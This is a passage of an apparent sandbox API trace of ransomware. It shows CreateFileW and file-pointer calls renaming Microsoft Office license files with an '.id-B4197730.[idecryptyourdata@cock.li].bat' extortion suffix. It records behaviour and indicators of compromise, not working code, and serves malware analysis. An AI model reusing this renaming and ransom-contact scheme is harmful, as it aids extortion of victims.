0xffffffff [0163.657] CloseHandle (hObject=0x514) returned 1 [0163.657] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.657] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.657] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription5-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription5-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.657] CloseHandle (hObject=0x514) returned 1 [0163.658] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.658] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.658] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription5-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription5-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.658] CloseHandle (hObject=0x514) returned 1 [0163.659] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.659] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.659] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest1-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest1-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.659] CloseHandle (hObject=0x514) returned 1 [0163.660] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.660] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.660] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest1-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest1-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.660] CloseHandle (hObject=0x514) returned 1 [0163.661] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.661] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.661] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest1-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest1-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.661] CloseHandle (hObject=0x514) returned 1 [0163.661] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.662] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.662] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest2-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest2-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.662] CloseHandle (hObject=0x514) returned 1 [0163.662] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.662] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.663] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest2-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest2-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.913] CloseHandle (hObject=0x514) returned 1 [0163.914] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.914] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.914] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_OEM_Perp-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_oem_perp-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.914] CloseHandle (hObject=0x514) returned 1 [0163.915] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.915] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.915] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_OEM_Perp-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_oem_perp-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.915] CloseHandle (hObject=0x514) returned 1 [0163.916] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.916] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.916] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_OEM_Perp-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_oem_perp-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.917] CloseHandle (hObject=0x514) returned 1 [0163.917] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.917] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.917] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_Retail-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_retail-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.918] CloseHandle (hObject=0x514) returned 1 [0163.918] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.919] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.919] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_Retail-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_retail-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.919] CloseHandle (hObject=0x514) returned 1 [0163.920] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.920] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.920] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_Retail-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_retail-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.920] CloseHandle (hObject=0x514) returned 1 [0163.921] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.921] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.921] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_Retail-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_retail-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.921] CloseHandle (hObject=0x514) returned 1 [0163.922] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.922] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.922] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_Trial-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_trial-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.922] CloseHandle (hObject=0x514) returned 1 [0163.923] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.923] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.923] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_Trial-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_trial-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.926] CloseHandle (hObject=0x514) returned 1 [0163.927] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.928] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.928] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_Trial-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_trial-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.928] CloseHandle (hObject=0x514) returned 1 [0163.929] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.930] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.930] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteVL_KMS_Client-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotevl_kms_client-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.930] CloseHandle (hObject=0x514) returned 1 [0163.931] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.931] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.931] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteVL_KMS_Client-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotevl_kms_client-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.932] CloseHandle (hObject=0x514) returned 1 [0163.933] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.933] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.933] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteVL_KMS_Client-ul.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotevl_kms_client-ul.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.933] CloseHandle (hObject=0x514) returned 1 [0163.934] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.934] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.934] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteVL_MAK-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotevl_mak-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.935] CloseHandle (hObject=0x514) returned 1 [0163.935] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.936] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.936] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteVL_MAK-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotevl_mak-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.936] CloseHandle (hObject=0x514) returned 1 [0163.937] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.937] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.937] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteVL_MAK-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotevl_mak-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.937] CloseHandle (hObject=0x514) returned 1 [0163.938] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.938] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.938] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteVL_MAK-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotevl_mak-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.938] CloseHandle (hObject=0x514) returned 1 [0163.939] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.939] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.939] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_Grace-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_grace-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.939] CloseHandle (hObject=0x514) returned 1 [0163.940] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.940] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.940] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_Grace-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_grace-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.941] CloseHandle (hObject=0x514) returned 1 [0163.941] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.941] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.942] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_OEM_Perp-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_oem_perp-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.942] CloseHandle (hObject=0x514) returned 1 [0163.943] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.943] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.943] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_OEM_Perp-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_oem_perp-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.943] CloseHandle (hObject=0x514) returned 1 [0163.944] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.944] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.944] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_OEM_Perp-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_oem_perp-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.945] CloseHandle (hObject=0x514) returned 1 [0163.945] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.946] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.946] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_OEM_Perp-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_oem_perp-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.946] CloseHandle (hObject=0x514) returned 1 [0164.226] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.226] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.226] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_Retail-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_retail-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.226] CloseHandle (hObject=0x51c) returned 1 [0164.227] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.227] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: 